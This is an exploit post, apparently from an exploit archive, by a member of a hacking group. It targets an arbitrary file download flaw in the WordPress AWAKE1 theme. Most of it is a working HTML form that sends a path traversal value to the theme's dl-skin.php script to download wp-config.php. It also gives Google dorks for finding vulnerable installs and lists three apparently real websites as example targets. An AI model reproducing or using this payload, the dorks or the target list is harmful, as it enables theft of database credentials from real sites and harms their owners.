facebook facebook twitter rss

Wordpress AWAKE1 Theme Arbitrary File Download Vulnerability

Author: Killer~X , Published: 04-01-2015
#Title : Wordpress AWAKE1 Theme Arbitrary File Download Vulnerability  

#Author : Killer~X

#Date : 1/1/2015
################ [ Killer~X ] ################
Facebook : http://www.facebook.com/xXalreshyXx

Ask : http://ask.fm/ALRESHY

Twitter : https://twitter.com/killerx00x

Email : M_ox@hotmail.com or Cco@hotmail.com

################ [ Killer~X ] ################


################ [ Yemeni Electronic Army ] ################

Yemeni Electronic Army : http://yeahacker.blogspot.in/

Official Members : Monds | King alnhzh | San3a T3rr0rist | GeeSuth | Al maistro | Muteb spack gen | Killer~X | Shraoop /.


################ [ Yemeni Electronic Army ] ################

__________________________________________________________________________________

#Vendor : www.wordpress.org

#google Dork :
1- inurl:/wp-content/themes/AWAKE1
2- wp-content/themes/AWAKE-1

#Tested on : windows


################################################

#Exploit :

<html>

<body>

<form action="http://127.0.0.1/wp-content/themes/awake1/lib/scripts/dl-skin.php" method="POST">

<b>File</b>:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>

<input type="submit" value=Download>

</form>

</body>





#example :
http://primoyazoo.com/wp-content/themes/awake1/lib/scripts/dl-skin.php
http://bakhtar-feldspar.com/en/wp-content/themes/awake1/lib/scripts/dl-skin.php
http://www.gamtnhealth.org/wp-content/themes/awake-1/lib/scripts/dl-skin.php



__________________________________________________________________________________

#Greeting to : All my friends

<3 I love u mom <3

||~ Done ~||

Like us on Facebook :